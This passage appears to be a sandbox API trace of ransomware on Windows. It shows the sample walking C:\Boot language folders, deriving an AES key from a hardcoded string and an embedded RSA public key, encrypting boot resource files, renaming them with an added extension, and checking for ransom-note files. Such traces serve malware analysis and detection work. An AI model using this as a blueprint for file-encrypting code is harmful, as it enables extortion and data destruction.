"c:\\boot\\el-gr\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.301] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.301] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275bb60) returned 1 [0231.304] CryptCreateHash (in: hProv=0x275bb60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.304] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.304] CryptHashData (hHash=0x394a68, pbData=0x2ecaa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.304] CryptDeriveKey (in: hProv=0x275bb60, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394be8) returned 1 [0231.304] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.304] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.304] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b940) returned 1 [0231.304] CryptImportPublicKeyInfo (in: hCryptProv=0x275b940, dwCertEncodingType=0x1, pInfo=0x2760110*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760140*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760148*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3944e8) returned 1 [0231.304] CryptEncrypt (in: hKey=0x3944e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.304] CryptEncrypt (in: hKey=0x3944e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275b830*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275b830*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.305] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275b830, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.305] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27653b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27653b0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.305] CryptEncrypt (in: hKey=0x394be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27653b0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27653b0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.305] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27653b0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.305] CloseHandle (hObject=0xffffffff) returned 1 [0231.305] CloseHandle (hObject=0xffffffff) returned 1 [0231.305] CopyFileA (lpExistingFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.305] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.305] DeleteFileA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.gsg")) returned 0 [0231.306] MoveFileA (lpExistingFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.fuck")) returned 0 [0231.306] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.306] CryptDestroyKey (hKey=0x394be8) returned 1 [0231.306] CryptReleaseContext (hProv=0x275bb60, dwFlags=0x0) returned 1 [0231.306] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.306] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.306] FindClose (in: hFindFile=0x3949a8 | out: hFindFile=0x3949a8) returned 1 [0231.306] GetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\el-gr\\readme_back_files.htm")) returned 0x20 [0231.307] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.307] FindFirstFileA (in: lpFileName="C:\\\\Boot\\en-GB\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x3949a8 [0231.308] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.308] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.308] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.308] GetLastError () returned 0x12 [0231.308] GetFileAttributesA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui")) returned 0x20 [0231.308] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.309] CreateFileA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.309] CreateFileA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.309] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.309] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275bcf8) returned 1 [0231.312] CryptCreateHash (in: hProv=0x275bcf8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.312] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.312] CryptHashData (hHash=0x394be8, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.312] CryptDeriveKey (in: hProv=0x275bcf8, Algid=0x6610, hBaseData=0x394be8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.312] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.312] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.312] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275bb60) returned 1 [0231.312] CryptImportPublicKeyInfo (in: hCryptProv=0x275bb60, dwCertEncodingType=0x1, pInfo=0x275fb60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275fb90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275fb98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394428) returned 1 [0231.312] CryptEncrypt (in: hKey=0x394428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.312] CryptEncrypt (in: hKey=0x394428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275bc70*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275bc70*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.313] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275bc70, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.313] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27659b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27659b8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.313] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27659b8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27659b8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.313] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27659b8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.313] CloseHandle (hObject=0xffffffff) returned 1 [0231.313] CloseHandle (hObject=0xffffffff) returned 1 [0231.313] CopyFileA (lpExistingFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.313] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.314] DeleteFileA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.gsg")) returned 0 [0231.314] MoveFileA (lpExistingFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.fuck")) returned 0 [0231.314] CryptDestroyHash (hHash=0x394be8) returned 1 [0231.314] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.314] CryptReleaseContext (hProv=0x275bcf8, dwFlags=0x0) returned 1 [0231.314] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.314] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.314] FindClose (in: hFindFile=0x3949a8 | out: hFindFile=0x3949a8) returned 1 [0231.321] GetFileAttributesA (lpFileName="C:\\\\Boot\\en-GB\\README_BACK_FILES.htm" (normalized: "c:\\boot\\en-gb\\readme_back_files.htm")) returned 0x20 [0231.321] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.321] FindFirstFileA (in: lpFileName="C:\\\\Boot\\en-US\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x394be8 [0231.325] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.325] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.325] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.325] GetLastError () returned 0x12 [0231.325] GetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0231.325] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.326] CreateFileA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.326] CreateFileA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.326] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.326] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b478) returned 1 [0231.329] CryptCreateHash (in: hProv=0x275b478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.329] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.329] CryptHashData (hHash=0x3949a8, pbData=0x2ecaa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.329] CryptDeriveKey (in: hProv=0x275b478, Algid=0x6610, hBaseData=0x3949a8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.329] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.329] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.329] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b7a8) returned 1 [0231.329] CryptImportPublicKeyInfo (in: hCryptProv=0x275b7a8, dwCertEncodingType=0x1, pInfo=0x275fa90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275fac0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275fac8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394368) returned 1 [0231.330] CryptEncrypt (in: hKey=0x394368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.330] CryptEncrypt (in: hKey=0x394368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275b8b8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275b8b8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.330] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275b8b8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.330] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2765fc0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2765fc0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.330] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2765fc0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2765fc0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.330] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2765fc0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.330] CloseHandle (hObject=0xffffffff) returned 1 [0231.330] CloseHandle (hObject=0xffffffff) returned 1 [0231.330] CopyFileA (lpExistingFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.331] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.331] DeleteFileA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.gsg")) returned 0 [0231.331] MoveFileA (lpExistingFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.fuck")) returned 0 [0231.331] CryptDestroyHash (hHash=0x3949a8) returned 1 [0231.331] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.331] CryptReleaseContext (hProv=0x275b478, dwFlags=0x0) returned 1 [0231.332] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.332] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.332] GetLastError () returned 0x5 [0231.332] GetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0231.333] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.333] CreateFileA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.333] CreateFileA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.334] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.334] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275bcf8) returned 1 [0231.336] CryptCreateHash (in: hProv=0x275bcf8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.336] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.336] CryptHashData (hHash=0x3949a8, pbData=0x2ec8a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.336] CryptDeriveKey (in: hProv=0x275bcf8, Algid=0x6610, hBaseData=0x3949a8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.336] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.336] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.336] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b3f0) returned 1 [0231.337] CryptImportPublicKeyInfo (in: hCryptProv=0x275b3f0, dwCertEncodingType=0x1, pInfo=0x275f680*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275f6b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275f6b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394468) returned 1 [0231.337] CryptEncrypt (in: hKey=0x394468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.337] CryptEncrypt (in: hKey=0x394468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275b1d0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275b1d0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.337] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275b1d0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.337] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27665c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27665c8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.337] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27665c8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27665c8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.337] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27665c8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.337] CloseHandle (hObject=0xffffffff) returned 1 [0231.337] CloseHandle (hObject=0xffffffff) returned 1 [0231.337] CopyFileA (lpExistingFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.338] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.338] DeleteFileA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.gsg")) returned 0 [0231.338] MoveFileA (lpExistingFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.fuck")) returned 0 [0231.339] CryptDestroyHash (hHash=0x3949a8) returned 1 [0231.339] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.339] CryptReleaseContext (hProv=0x275bcf8, dwFlags=0x0) returned 1 [0231.339] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.339] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.339] FindClose (in: hFindFile=0x394be8 | out: hFindFile=0x394be8) returned 1 [0231.339] GetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\boot\\en-us\\readme_back_files.htm")) returned 0x20 [0231.340] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.340] FindFirstFileA (in: lpFileName="C:\\\\Boot\\es-ES\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x3949a8 